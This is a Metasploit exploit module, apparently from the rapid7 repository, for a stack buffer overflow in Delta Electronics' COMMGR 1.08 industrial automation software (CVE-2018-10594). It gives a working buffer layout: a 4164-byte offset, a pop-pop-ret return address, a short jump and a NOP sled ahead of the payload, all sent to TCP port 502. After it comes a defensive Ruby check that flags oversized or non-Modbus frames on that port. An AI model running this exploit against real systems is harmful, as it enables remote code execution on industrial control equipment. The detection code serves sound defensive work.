GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/scada/delta_ia_commgr_bof.rb
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
      'Description' => %q{
        This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
        Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
        crafted packets. This module has been tested successfully on Delta Electronics Delta
        Industrial Automation COMMGR 1.08 over
        Windows XP SP3,
        Windows 7 SP1, and
        Windows 8.1.
      },
      'Author' =>
        [
          'ZDI', # Initial discovery
          't4rkd3vilz', # PoC
          'hubertwslin' # Metasploit module
        ],
      'References' =>
        [
          [ 'CVE', '2018-10594' ],
          [ 'BID', '104529' ],
          [ 'ZDI', '18-586' ],
          [ 'ZDI', '18-588' ],
          [ 'EDB', '44965' ],
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01' ]
        ],
      'Payload' =>
        {
          'Space' => 640,
          'DisableNops' => true,
          'BadChars' => "\x00"
        },
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'COMMGR 1.08 / Windows Universal',
            {
              'Ret' => 0x00401e14, # p/p/r COMMGR.exe
              'Offset' => 4164
            }
          ],
        ],
      'DisclosureDate' => '2018-07-02',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(502)
      ])
  end

  def exploit
    data = rand_text_alpha(target['Offset'])
    data << "\xeb\x27\x90\x90" # jmp short $+27 to the NOP sled
    data << [target.ret].pack("V")
    data << make_nops(40)
    data << payload.encoded

    print_status("Trying target #{target.name}, sending #{data.length} bytes...")
    connect
    sock.put(data)
    disconnect
  end
end
```
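The module above delivers its overflow as a single write of several kilobytes to COMMGR's TCP port 502. The following is an added defender-side check, not part of the Metasploit module, that flags such writes in captured traffic; it assumes that legitimate traffic on port 502 is Modbus/TCP sized (a maximum ADU of 260 bytes with a consistent MBAP header), and the sample payloads are constructed for the demonstration.

```ruby
# Added example (not from the Metasploit module): inspect a TCP payload
# destined for port 502 and report why it looks anomalous.
# Assumption: COMMGR traffic on 502 is expected to be Modbus/TCP sized.

MODBUS_PORT = 502
# Modbus/TCP ADU maximum: 7-byte MBAP header + 253-byte PDU.
MODBUS_MAX_ADU = 260

# Returns an array of finding strings; an empty array means the frame passes.
def commgr_frame_findings(dport, payload)
  findings = []
  return findings unless dport == MODBUS_PORT

  if payload.bytesize > MODBUS_MAX_ADU
    findings << "oversized frame: #{payload.bytesize} bytes (max #{MODBUS_MAX_ADU})"
  end

  if payload.bytesize >= 7
    # MBAP header: transaction id (2), protocol id (2), length (2), unit id (1)
    _tid, proto, len, _uid = payload.unpack("nnnC")
    findings << "non-Modbus protocol id #{proto}" unless proto.zero?
    # The length field counts unit id + PDU, so the ADU should be len + 6 bytes.
    if len + 6 != payload.bytesize
      findings << "MBAP length #{len} does not match frame size #{payload.bytesize}"
    end
  end
  findings
end

# Constructed samples for the demonstration.
# Legitimate Read Holding Registers request: tid=1, proto=0, len=6, unit=1,
# function 3, start address 0, quantity 10 (12 bytes in total).
GOOD_REQUEST = [1, 0, 6, 1, 3, 0, 10].pack("nnnCCnn")
# A constructed filler blob in the size class the module writes; no exploit content.
JUNK_BLOB = "A" * 4200

if __FILE__ == $0
  puts "good request: #{commgr_frame_findings(502, GOOD_REQUEST).inspect}"
  puts "junk blob:    #{commgr_frame_findings(502, JUNK_BLOB).inspect}"
end
```

In a real deployment the same check would run over reassembled TCP streams rather than single segments, since the anomalous write can be split across segments.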